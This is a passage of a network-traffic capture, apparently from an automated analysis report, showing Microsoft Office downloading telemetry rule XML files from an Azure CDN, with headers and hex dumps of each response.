                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:04 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            102192.168.2.54982713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:04 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:04 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 174
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                                            x-ms-request-id: 0607cd43-401e-0078-1b00-174d34000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030904Z-1657d5bbd48qjg85buwfdynm5w00000004f000000000edvp
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:05 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            103192.168.2.54982813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:05 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:05 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:05 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1952
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                                            x-ms-request-id: a5ff6bd9-301e-005d-3af2-16e448000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030905Z-1657d5bbd48q6t9vvmrkd293mg00000004e0000000003uta
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:05 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            104192.168.2.54982913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:05 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:05 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 958
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                            x-ms-request-id: 0c165d1d-a01e-000d-7dfe-16d1ea000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030905Z-1657d5bbd482lxwq1dp2t1zwkc0000000470000000003ny1
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:05 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            105192.168.2.54983013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:05 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:05 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 501
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                                                            x-ms-request-id: c2f609cb-201e-0003-75fd-16f85a000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030905Z-1657d5bbd48762wn1qw4s5sd3000000004bg000000000w3d
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:05 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            106192.168.2.54983113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:05 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:05 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:05 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 2592
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                            x-ms-request-id: 33b4d0ae-a01e-0032-35ff-161949000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030905Z-1657d5bbd48vhs7r2p1ky7cs5w00000004kg00000000smuu
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:05 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            107192.168.2.54983213.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:05 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:05 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:05 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 3342
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                            x-ms-request-id: 960edd56-701e-005c-4100-17bb94000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030905Z-1657d5bbd48wd55zet5pcra0cg00000004f0000000000w31
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:05 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            108192.168.2.54983313.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:05 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:05 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:05 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 2284
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                            x-ms-request-id: b738acd5-401e-0067-1502-1709c2000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030905Z-1657d5bbd48qjg85buwfdynm5w00000004c000000000rv7b
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:05 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            109192.168.2.54983413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:05 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:05 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:05 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1393
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                            x-ms-request-id: 8a5fd43d-c01e-0066-4506-17a1ec000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030905Z-1657d5bbd48f7nlxc7n5fnfzh0000000040000000000efar
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:05 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            110192.168.2.54983613.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:05 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:06 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:05 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1393
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                            x-ms-request-id: b72ef555-401e-0067-78fe-1609c2000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030905Z-1657d5bbd482lxwq1dp2t1zwkc000000043g00000000e0hc
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:06 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            111192.168.2.54983513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:05 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:06 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:05 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1356
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
